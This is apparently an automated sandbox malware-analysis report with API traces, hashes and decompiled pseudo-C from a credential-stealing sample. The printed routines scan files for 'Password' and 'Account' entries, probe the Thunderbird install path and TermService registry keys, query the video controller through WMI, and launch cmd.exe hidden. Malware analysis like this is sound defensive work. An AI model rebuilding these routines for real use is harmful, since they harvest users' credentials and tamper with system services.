                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: OpenQueryValuelstrlen$CloseFreeVirtuallstrcpy
                                                                    • String ID: ImagePath$SYSTEM\CurrentControlSet\Services\TermService$SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$svchost.exe$svchost.exe -k
                                                                    • API String ID: 2246401353-3333427388
                                                                    • Opcode ID: acd25fc8a8e6b147716e62dbd37e7e29ddac49fe5d1828a56835e5cde547d75c
                                                                    • Instruction ID: b9ed19d49a654b96b8da8925e4aefeaf4d99474c208cfe44d3dd70ad1006d916
                                                                    • Opcode Fuzzy Hash: acd25fc8a8e6b147716e62dbd37e7e29ddac49fe5d1828a56835e5cde547d75c
                                                                    • Instruction Fuzzy Hash: 0C41EC71D40228BBEF14EBA0ED95EEEB77AEF64744F500165D90172690EB359E08CFA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404140 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 79registrylibraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(Advapi32.dll,745D21E0,00000000,?,00405379,?), ref: 0040415A
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 0040416A
                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00404192
                                                                    • GetModuleHandleA.KERNEL32(Advapi32.dll,745D21E0,00000000,?,00405379,?), ref: 004041B7
                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExA), ref: 004041C7
                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00404209
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: AddressDeleteHandleModuleProc
                                                                    • String ID: Advapi32.dll$RegDeleteKeyExA$RegDeleteKeyTransactedA
                                                                    • API String ID: 588496660-4191909587
                                                                    • Opcode ID: cdbaf511d23021004905ddd44b9eb96a329afd81a02c84bcac3e81cc22828284
                                                                    • Instruction ID: 31cb0f562f2addb13c78b9d3578784c73011449209a938ffb56c889bd236f6ef
                                                                    • Opcode Fuzzy Hash: cdbaf511d23021004905ddd44b9eb96a329afd81a02c84bcac3e81cc22828284
                                                                    • Instruction Fuzzy Hash: 5721077A340304BFE7205BA9EC08BD67B54EBB5351F14403BF608E91E0DB799494DB68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040D982 Relevance: 15.1, APIs: 10, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 0040D998
                                                                      • Part of subcall function 0040DD40: HeapFree.KERNEL32(00000000,00000000,?,004113D6,?,00000000,?,00000000,?,004113FD,?,00000007,?,?,00411801,?), ref: 0040DD56
                                                                      • Part of subcall function 0040DD40: GetLastError.KERNEL32(?,?,004113D6,?,00000000,?,00000000,?,004113FD,?,00000007,?,?,00411801,?,?), ref: 0040DD68
                                                                    • _free.LIBCMT ref: 0040D9A4
                                                                    • _free.LIBCMT ref: 0040D9AF
                                                                    • _free.LIBCMT ref: 0040D9BA
                                                                    • _free.LIBCMT ref: 0040D9C5
                                                                    • _free.LIBCMT ref: 0040D9D0
                                                                    • _free.LIBCMT ref: 0040D9DB
                                                                    • _free.LIBCMT ref: 0040D9E6
                                                                    • _free.LIBCMT ref: 0040D9F1
                                                                    • _free.LIBCMT ref: 0040D9FF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 322fca033e056e5ddd0bd499672412c1b1e73136b32eb58e03349ce2567b41c9
                                                                    • Instruction ID: 212a4a0f6f2174d3900e3400fc6909053a36871c0fe51127085b706aebf44512
                                                                    • Opcode Fuzzy Hash: 322fca033e056e5ddd0bd499672412c1b1e73136b32eb58e03349ce2567b41c9
                                                                    • Instruction Fuzzy Hash: 0B219876900108AFCB41EFD5C881DEE7BB9FF48344F0041AAF619AF161DB35EA588B84
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D19ADF Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 229fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 97%
                                                                    			E02D19ADF(intOrPtr __ecx, CHAR* _a4) {
				char _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _t96;
				void* _t102;
				char _t104;
				void* _t125;
				intOrPtr _t127;
				char _t128;
				long _t133;
				void* _t135;
				intOrPtr _t136;
				void* _t141;
				void* _t146;
				void* _t147;
				intOrPtr* _t165;
				intOrPtr* _t167;
				void* _t168;
				void* _t169;
				void* _t170;
				void* _t172;
				intOrPtr* _t173;
				void* _t174;
				intOrPtr _t175;
				intOrPtr* _t177;
				CHAR* _t178;
				void* _t179;
				void* _t180;

				_v36 = __ecx;
				_t174 = CreateFileA(_a4, 0x80000000, 7, 0, 3, 0, 0);
				if(_t174 != 0xffffffff) {
					_t133 = GetFileSize(_t174, 0);
					_v16 = _t133;
					_t172 = E02D11085(_t133);
					_v32 = _t172;
					E02D11052(_t172, 0, _t133);
					_v24 = _v24 & 0x00000000;
					_t180 = _t179 + 0x10;
					ReadFile(_t174, _t172, _t133,  &_v24, 0);
					CloseHandle(_t174);
					_t175 = E02D15EB4(0x400000);
					_v28 = _t175;
					_a4 = E02D15EB4(0x104);
					_t96 = E02D15EB4(0x104);
					_t141 = 0;
					_v12 = _t96;
					_t135 = 0;
					__eflags = _v16;
					if(_v16 <= 0) {
						L36:
						E02D15EA5(_a4);
						E02D15EA5(_v12);
						E02D15EA5(_t175);
						return E02D11099(_t172);
					} else {
						goto L3;
					}
					do {
						L3:
						_t167 =  *((intOrPtr*)(_t135 + _t172));
						_t13 = _t167 - 0x21; // -33
						__eflags = _t13 - 0x5d;
						if(_t13 > 0x5d) {
							goto L28;
						}
						__eflags = _t167 - 0x3d;
						if(_t167 == 0x3d) {
							goto L28;
						}
						 *((char*)(_t141 + _t175)) = _t167;
						_t141 = _t141 + 1;
						__eflags = _t167;
						if(_t167 != 0) {
							__eflags =  *((char*)(_t141 + _t175 - 8)) - 0x50;
							if( *((char*)(_t141 + _t175 - 8)) != 0x50) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 7)) - 0x61;
							if( *((char*)(_t141 + _t175 - 7)) != 0x61) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 6)) - 0x73;
							if( *((char*)(_t141 + _t175 - 6)) != 0x73) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 5)) - 0x73;
							if( *((char*)(_t141 + _t175 - 5)) != 0x73) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 4)) - 0x77;
							if( *((char*)(_t141 + _t175 - 4)) != 0x77) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 3)) - 0x6f;
							if( *((char*)(_t141 + _t175 - 3)) != 0x6f) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 2)) - 0x72;
							if( *((char*)(_t141 + _t175 - 2)) != 0x72) {
								goto L28;
							}
							__eflags =  *((char*)(_t141 + _t175 - 1)) - 0x64;
							if( *((char*)(_t141 + _t175 - 1)) == 0x64) {
								__eflags =  *_t172 - 0xd0;
								_t102 = 2;
								_t146 = 9;
								_t103 =  !=  ? _t146 : _t102;
								_t168 = 0;
								_t147 = ( !=  ? _t146 : _t102) + _t135;
								_t104 =  *((intOrPtr*)(_t147 + _t172));
								__eflags = _t104 - 0x20;
								if(_t104 <= 0x20) {
									L35:
									_t60 =  &_v12; // 0x50
									__eflags = 0;
									_v52 = 0;
									_v48 = 0;
									_v44 = 0;
									 *((char*)(_t168 +  *_t60)) = 0;
									E02D133BF( &_v20,  *_t60);
									_t66 =  &_a4; // 0x50
									E02D133BF( &_v16,  *_t66);
									E02D13437( &_v44, E02D1309D( &_v20, __eflags,  &_v32));
									E02D15EA5(_v32);
									E02D13437( &_v48, E02D1309D( &_v16, __eflags,  &_v32));
									E02D15EA5(_v32);
									_v40 = 5;
									E02D13437( &_v52, E02D135E5( &_v32, 0x2d24648));
									E02D15EA5(_v32);
									E02D11F95(_t180 - 0x10,  &_v52);
									E02D11FCB(_v36);
									E02D15EA5(_v16);
									E02D15EA5(_v20);
									E02D113EF( &_v52);
									goto L36;
								}
								_t58 =  &_v12; // 0x50
								_t136 =  *_t58;
								_t165 = _t147 + _t172;
								__eflags = _t165;
								while(1) {
									__eflags = _t104 - 0x7f;
									if(_t104 >= 0x7f) {
										goto L35;
									}
									__eflags = _t104 - 0x21;
									if(_t104 == 0x21) {
										goto L35;
									}
									 *((char*)(_t168 + _t136)) = _t104;
									_t168 = _t168 + 1;
									_t165 = _t165 + 1;
									_t104 =  *_t165;
									__eflags = _t104 - 0x20;
									if(_t104 > 0x20) {
										continue;
									}
									goto L35;
								}
								goto L35;
							}
							goto L28;
						}
						__eflags = _t141 - 7;
						if(_t141 <= 7) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 7)) - 0x41;
						if( *((char*)(_t141 + _t175 - 7)) != 0x41) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 6)) - 0x63;
						if( *((char*)(_t141 + _t175 - 6)) != 0x63) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 5)) - 0x63;
						if( *((char*)(_t141 + _t175 - 5)) != 0x63) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 4)) - 0x6f;
						if( *((char*)(_t141 + _t175 - 4)) != 0x6f) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 3)) - 0x75;
						if( *((char*)(_t141 + _t175 - 3)) != 0x75) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 2)) - 0x6e;
						if( *((char*)(_t141 + _t175 - 2)) != 0x6e) {
							goto L28;
						}
						__eflags =  *((char*)(_t141 + _t175 - 1)) - 0x74;
						if( *((char*)(_t141 + _t175 - 1)) != 0x74) {
							goto L28;
						}
						__eflags =  *_t172 - 0xd0;
						_t125 = 2;
						_t169 = 9;
						_t126 =  !=  ? _t169 : _t125;
						_t170 = 0;
						_t127 = ( !=  ? _t169 : _t125) + _t135;
						_v20 = _t127;
						_t128 =  *((intOrPtr*)(_t127 + _t172));
						__eflags = _t128 - 0x20;
						if(_t128 <= 0x20) {
							L19:
							 *((char*)(_t170 + _a4)) = 0;
							goto L28;
						}
						_t177 = _v20 + _t172;
						__eflags = _t177;
						_v20 = _t177;
						_t173 = _t177;
						_t178 = _a4;
						while(1) {
							__eflags = _t128 - 0x7f;
							if(_t128 >= 0x7f) {
								break;
							}
							_t173 = _t173 + 1;
							 *((char*)(_t170 + _t178)) = _t128;
							_t170 = _t170 + 1;
							_t128 =  *_t173;
							__eflags = _t128 - 0x20;
							if(_t128 > 0x20) {
								continue;
							}
							break;
						}
						_t175 = _v28;
						_t172 = _v32;
						goto L19;
						L28:
						_t135 = _t135 + 1;
						__eflags = _t135 - _v16;
					} while (_t135 < _v16);
					goto L36;
				}
				GetLastError();
				return CloseHandle(_t174);
			}







































                                                                    0x02d19aea
                                                                    0x02d19b02
                                                                    0x02d19b07
                                                                    0x02d19b23
                                                                    0x02d19b26
                                                                    0x02d19b2f
                                                                    0x02d19b34
                                                                    0x02d19b37
                                                                    0x02d19b3c
                                                                    0x02d19b43
                                                                    0x02d19b4c
                                                                    0x02d19b53
                                                                    0x02d19b63
                                                                    0x02d19b6c
                                                                    0x02d19b76
                                                                    0x02d19b79
                                                                    0x02d19b7e
                                                                    0x02d19b80
                                                                    0x02d19b85
                                                                    0x02d19b87
                                                                    0x02d19b8a
                                                                    0x02d19d75
                                                                    0x02d19d78
                                                                    0x02d19d80
                                                                    0x02d19d87
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19b90
                                                                    0x02d19b90
                                                                    0x02d19b90
                                                                    0x02d19b93
                                                                    0x02d19b96
                                                                    0x02d19b98
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19b9e
                                                                    0x02d19ba1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19ba7
                                                                    0x02d19baa
                                                                    0x02d19bab
                                                                    0x02d19bad
                                                                    0x02d19c4c
                                                                    0x02d19c51
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19c53
                                                                    0x02d19c58
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19c5a
                                                                    0x02d19c5f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19c61
                                                                    0x02d19c66
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19c68
                                                                    0x02d19c6d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19c6f
                                                                    0x02d19c74
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19c76
                                                                    0x02d19c7b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19c7d
                                                                    0x02d19c82
                                                                    0x02d19c93
                                                                    0x02d19c98
                                                                    0x02d19c9b
                                                                    0x02d19c9c
                                                                    0x02d19c9f
                                                                    0x02d19ca1
                                                                    0x02d19ca4
                                                                    0x02d19ca7
                                                                    0x02d19ca9
                                                                    0x02d19cc3
                                                                    0x02d19cc3
                                                                    0x02d19cc6
                                                                    0x02d19cc8
                                                                    0x02d19ccb
                                                                    0x02d19cce
                                                                    0x02d19cd1
                                                                    0x02d19cd8
                                                                    0x02d19cdd
                                                                    0x02d19ce3
                                                                    0x02d19cf8
                                                                    0x02d19d00
                                                                    0x02d19d15
                                                                    0x02d19d1d
                                                                    0x02d19d2a
                                                                    0x02d19d3a
                                                                    0x02d19d42
                                                                    0x02d19d50
                                                                    0x02d19d58
                                                                    0x02d19d60
                                                                    0x02d19d68
                                                                    0x02d19d70
                                                                    0x00000000
                                                                    0x02d19d70
                                                                    0x02d19cab
                                                                    0x02d19cab
                                                                    0x02d19cae
                                                                    0x02d19cae
                                                                    0x02d19cb0
                                                                    0x02d19cb0
                                                                    0x02d19cb2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19cb4
                                                                    0x02d19cb6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19cb8
                                                                    0x02d19cbb
                                                                    0x02d19cbc
                                                                    0x02d19cbd
                                                                    0x02d19cbf
                                                                    0x02d19cc1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19cc1
                                                                    0x00000000
                                                                    0x02d19cb0
                                                                    0x00000000
                                                                    0x02d19c82
                                                                    0x02d19bb3
                                                                    0x02d19bb6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19bbc
                                                                    0x02d19bc1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19bc7
                                                                    0x02d19bcc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19bd2
                                                                    0x02d19bd7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19bdd
                                                                    0x02d19be2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19be8
                                                                    0x02d19bed
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19bf3
                                                                    0x02d19bf8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19bfe
                                                                    0x02d19c03
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19c05
                                                                    0x02d19c0a
                                                                    0x02d19c0d
                                                                    0x02d19c0e
                                                                    0x02d19c11
                                                                    0x02d19c13
                                                                    0x02d19c15
                                                                    0x02d19c18
                                                                    0x02d19c1b
                                                                    0x02d19c1d
                                                                    0x02d19c41
                                                                    0x02d19c44
                                                                    0x00000000
                                                                    0x02d19c48
                                                                    0x02d19c22
                                                                    0x02d19c22
                                                                    0x02d19c24
                                                                    0x02d19c27
                                                                    0x02d19c29
                                                                    0x02d19c2c
                                                                    0x02d19c2c
                                                                    0x02d19c2e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19c30
                                                                    0x02d19c31
                                                                    0x02d19c34
                                                                    0x02d19c35
                                                                    0x02d19c37
                                                                    0x02d19c39
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d19c39
                                                                    0x02d19c3b
                                                                    0x02d19c3e
                                                                    0x00000000
                                                                    0x02d19c84
                                                                    0x02d19c84
                                                                    0x02d19c85
                                                                    0x02d19c85
                                                                    0x00000000
                                                                    0x02d19c8e
                                                                    0x02d19b09
                                                                    0x00000000

                                                                    APIs
                                                                    • CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 02D19AFC
                                                                    • GetLastError.KERNEL32 ref: 02D19B09
                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D19B10
                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 02D19B1D
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02D19B4C
                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D19B53
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$CloseHandle$CreateErrorLastReadSize
                                                                    • String ID: Password$Password
                                                                    • API String ID: 1366138817-7788977
                                                                    • Opcode ID: 861dd51d597c72b2478fe4b90d0ddf3cb73a3c183496c77463936f5ad0401a86
                                                                    • Instruction ID: 5810d38cabab6866bd42013b5a7df645dd9ca3b67c12d343b173a6f9b70a5f8c
                                                                    • Opcode Fuzzy Hash: 861dd51d597c72b2478fe4b90d0ddf3cb73a3c183496c77463936f5ad0401a86
                                                                    • Instruction Fuzzy Hash: 948104B0D04148BEEF25DBA8F8A0BEDBFA6AF81304F50406ED48167B81CB755D46CB61
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1F80E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 130comCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02D1F825
                                                                    • CoInitialize.OLE32(00000000), ref: 02D1F82C
                                                                    • CoCreateInstance.OLE32(02D24490,00000000,00000017,02D26E60,?,?,?,?,?,?,?,?,?,02D12D0C), ref: 02D1F84A
                                                                    • VariantInit.OLEAUT32(?), ref: 02D1F8CE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Initialize$CreateInitInstanceSecurityVariant
                                                                    • String ID: Name$SELECT Name FROM Win32_VideoController$WQL$root\CIMV2
                                                                    • API String ID: 2382742315-3227336550
                                                                    • Opcode ID: 85118ceba9c344d6a05d32e17847d768b58d9826648e28f43bc882b7cac3979f
                                                                    • Instruction ID: 24793e60457a2f9279c74cc21a2a7c55e5128b4f65139b3cb26f9f4249422f88
                                                                    • Opcode Fuzzy Hash: 85118ceba9c344d6a05d32e17847d768b58d9826648e28f43bc882b7cac3979f
                                                                    • Instruction Fuzzy Hash: 88411670A00249BFDB14DB95DC48EAFBBBDEFC9B18B104498F516EB650D670AD09CB20
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D21F13 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 75sleepprocessmemoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 68%
                                                                    			E02D21F13() {
				void* _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;
				int _t10;
				void* _t23;
				int _t24;
				CHAR* _t26;

				_v8 = 0;
				_t10 = GetCurrentProcess();
				__imp__IsWow64Process(_t10,  &_v8);
				if(_t10 != 0) {
					if(_v8 == 0) {
						_t10 = E02D220B8(_t23, __eflags);
						__eflags = _t10;
						if(_t10 != 0) {
							_t24 = _t10;
							goto L6;
						}
					} else {
						_t26 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
						GetWindowsDirectoryA(_t26, 0x104);
						E02D1102C( &(_t26[lstrlenA(_t26)]), "\\System32\\cmd.exe", 0x14);
						E02D11052( &_v100, 0, 0x44);
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t10 = CreateProcessA(_t26, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v100,  &_v24);
						if(_t10 != 0) {
							Sleep(0x3e8);
							_t24 = _v24.dwProcessId;
							L6:
							return E02D21FD8(_t24);
						}
					}
				}
				return _t10;
			}










                                                                    0x02d21f22
                                                                    0x02d21f25
                                                                    0x02d21f2c
                                                                    0x02d21f34
                                                                    0x02d21f3d
                                                                    0x02d21fc3
                                                                    0x02d21fc8
                                                                    0x02d21fca
                                                                    0x02d21fcc
                                                                    0x00000000
                                                                    0x02d21fcc
                                                                    0x02d21f43
                                                                    0x02d21f56
                                                                    0x02d21f5e
                                                                    0x02d21f75
                                                                    0x02d21f84
                                                                    0x02d21f8e
                                                                    0x02d21f92
                                                                    0x02d21f93
                                                                    0x02d21f94
                                                                    0x02d21fa9
                                                                    0x02d21fb1
                                                                    0x02d21fb8
                                                                    0x02d21fbe
                                                                    0x02d21fce
                                                                    0x00000000
                                                                    0x02d21fce
                                                                    0x02d21fb1
                                                                    0x02d21f3d
                                                                    0x02d21fd7

                                                                    APIs
                                                                    • GetCurrentProcess.KERNEL32(?,00000000,745D0770,00000000), ref: 02D21F25
                                                                    • IsWow64Process.KERNEL32(00000000), ref: 02D21F2C
                                                                    • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040), ref: 02D21F50
                                                                    • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 02D21F5E
                                                                    • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 02D21F6C
                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02D21FA9
                                                                    • Sleep.KERNEL32(000003E8), ref: 02D21FB8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$AllocCreateCurrentDirectorySleepVirtualWindowsWow64lstrlen
                                                                    • String ID: \System32\cmd.exe
                                                                    • API String ID: 3151064845-2003734499
                                                                    • Opcode ID: e30f0d67b10b0f3ea7bcf7bd073f69aa4adbcdde7dc5bfe1220792854650b540
                                                                    • Instruction ID: 178586bd109a26611bcd5ea442039cd91611748fdc1099cf8b36d2d4cff5b7a6
                                                                    • Opcode Fuzzy Hash: e30f0d67b10b0f3ea7bcf7bd073f69aa4adbcdde7dc5bfe1220792854650b540
                                                                    • Instruction Fuzzy Hash: 651184B2A40218BBE72097B5ED49FAF776CEB14749F104420FB05E6281DB70DE08CA75
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 02D1C118 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56registrystringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E02D1C118(WCHAR* __ecx, char* __edx, void* __eflags) {
				void* _v8;
				int _v12;
				int _v16;
				short _v536;
				char* _t32;
				WCHAR* _t33;

				_v12 = 0x104;
				_v16 = 1;
				_t32 = __edx;
				_t33 = __ecx;
				E02D11052( &_v536, 0, 0x104);
				lstrcpyW( &_v536, L"Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\");
				lstrcatW( &_v536, _t33);
				if(RegOpenKeyExW(0x80000002,  &_v536, 0, 1,  &_v8) != 0) {
					return 0;
				}
				RegQueryValueExW(_v8, L"Path", 0,  &_v16, _t32,  &_v12);
				RegCloseKey(_v8);
				return 1;
			}









                                                                    0x02d1c12c
                                                                    0x02d1c136
                                                                    0x02d1c13c
                                                                    0x02d1c13e
                                                                    0x02d1c140
                                                                    0x02d1c154
                                                                    0x02d1c162
                                                                    0x02d1c183
                                                                    0x00000000
                                                                    0x02d1c1ab
                                                                    0x02d1c198
                                                                    0x02d1c1a1
                                                                    0x00000000

                                                                    APIs
                                                                    • lstrcpyW.KERNEL32 ref: 02D1C154
                                                                    • lstrcatW.KERNEL32(?,thunderbird.exe), ref: 02D1C162
                                                                    • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,02D1A729,?,00000104,00000000), ref: 02D1C17B
                                                                    • RegQueryValueExW.ADVAPI32(02D1A729,Path,00000000,?,?,?,?,00000104,00000000), ref: 02D1C198
                                                                    • RegCloseKey.ADVAPI32(02D1A729,?,00000104,00000000), ref: 02D1C1A1
                                                                    Strings
